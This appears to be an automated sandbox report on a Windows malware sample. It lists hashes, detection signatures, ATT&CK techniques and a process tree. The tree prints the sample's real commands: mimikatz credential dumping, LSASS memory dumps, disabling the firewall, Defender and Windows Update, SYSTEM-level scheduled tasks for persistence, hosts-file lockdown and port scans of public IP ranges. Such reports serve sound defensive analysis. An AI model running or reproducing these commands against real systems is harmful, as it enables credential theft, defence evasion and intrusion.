Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
03/04/2025, 15:11
General
-
Target
2025-04-03_51635864b8f4be184fec1d40668df298_amadey_cloudeye_hacktools_icedid_mimikatz_rhadamanthys_smoke-loader.exe
-
Size
17.7MB
-
MD5
51635864b8f4be184fec1d40668df298
-
SHA1
d46d812f370d0a07054ac7c08954dffc0b0490ea
-
SHA256
6ba089afd77a927bdc61fd4d5e3acdfdb4bde7f308b212de67005ae1631c679a
-
SHA512
9b123b5b8e3c1e0973d23024926f4a5a082370b59db7e828b9510228d99de66afd3bdd7a76afc8c83ead14bd3e6833d75ab358475385d256fac492a5d561cbfc
-
SSDEEP
196608:I6mknGzwHdOgEPHd9BbX/nivPlTXTYrE6mknGzwHdOgEPHd9BbX/nivPlTXTYro:Sjz0EJ7/iv1Vjz0EJ7/iv17
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (28042) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 32 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 38 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 47 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\eeqblllmv\hplfju.exe"C:\Windows\TEMP\eeqblllmv\hplfju.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2025-04-03_51635864b8f4be184fec1d40668df298_amadey_cloudeye_hacktools_icedid_mimikatz_rhadamanthys_smoke-loader.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-03_51635864b8f4be184fec1d40668df298_amadey_cloudeye_hacktools_icedid_mimikatz_rhadamanthys_smoke-loader.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ylybunzr\branegt.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\ylybunzr\branegt.exeC:\Windows\ylybunzr\branegt.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\ylybunzr\branegt.exeC:\Windows\ylybunzr\branegt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ylphdetvt\ybbniztkb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\ylphdetvt\ybbniztkb\wpcap.exeC:\Windows\ylphdetvt\ybbniztkb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ylphdetvt\ybbniztkb\puellhpnz.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ylphdetvt\ybbniztkb\Scant.txt2⤵
-
C:\Windows\ylphdetvt\ybbniztkb\puellhpnz.exeC:\Windows\ylphdetvt\ybbniztkb\puellhpnz.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ylphdetvt\ybbniztkb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ylphdetvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ylphdetvt\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\ylphdetvt\Corporate\vfshost.exeC:\Windows\ylphdetvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtynenyzi" /ru system /tr "cmd /c C:\Windows\ime\branegt.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gtynenyzi" /ru system /tr "cmd /c C:\Windows\ime\branegt.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rnblyvngt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ylybunzr\branegt.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rnblyvngt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ylybunzr\branegt.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kreqlkkni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kreqlkkni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 796 C:\Windows\TEMP\ylphdetvt\796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 1016 C:\Windows\TEMP\ylphdetvt\1016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2032 C:\Windows\TEMP\ylphdetvt\2032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2516 C:\Windows\TEMP\ylphdetvt\2516.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2948 C:\Windows\TEMP\ylphdetvt\2948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3064 C:\Windows\TEMP\ylphdetvt\3064.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 1776 C:\Windows\TEMP\ylphdetvt\1776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3732 C:\Windows\TEMP\ylphdetvt\3732.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3828 C:\Windows\TEMP\ylphdetvt\3828.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3940 C:\Windows\TEMP\ylphdetvt\3940.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 4020 C:\Windows\TEMP\ylphdetvt\4020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 4496 C:\Windows\TEMP\ylphdetvt\4496.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 4484 C:\Windows\TEMP\ylphdetvt\4484.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2260 C:\Windows\TEMP\ylphdetvt\2260.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2276 C:\Windows\TEMP\ylphdetvt\2276.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 556 C:\Windows\TEMP\ylphdetvt\556.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 4948 C:\Windows\TEMP\ylphdetvt\4948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 4632 C:\Windows\TEMP\ylphdetvt\4632.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3784 C:\Windows\TEMP\ylphdetvt\3784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ylphdetvt\ybbniztkb\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\ylphdetvt\ybbniztkb\ienepbmlg.exeienepbmlg.exe TCP 212.102.0.1 7001 512 /save3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\ylphdetvt\ybbniztkb\ienepbmlg.exeienepbmlg.exe TCP 212.102.255.255 7001 512 /save3⤵
- Executes dropped EXE
-
-
C:\Windows\ylphdetvt\ybbniztkb\ienepbmlg.exeienepbmlg.exe TCP 79.50.0.1 79.50.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\umqeiy.exeC:\Windows\SysWOW64\umqeiy.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\branegt.exe1⤵
-
C:\Windows\ime\branegt.exeC:\Windows\ime\branegt.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ylybunzr\branegt.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ylybunzr\branegt.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\branegt.exe1⤵
-
C:\Windows\ime\branegt.exeC:\Windows\ime\branegt.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ylybunzr\branegt.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ylybunzr\branegt.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
33.6MB
MD5fae2e86dc83e308301e90b9a667f7491
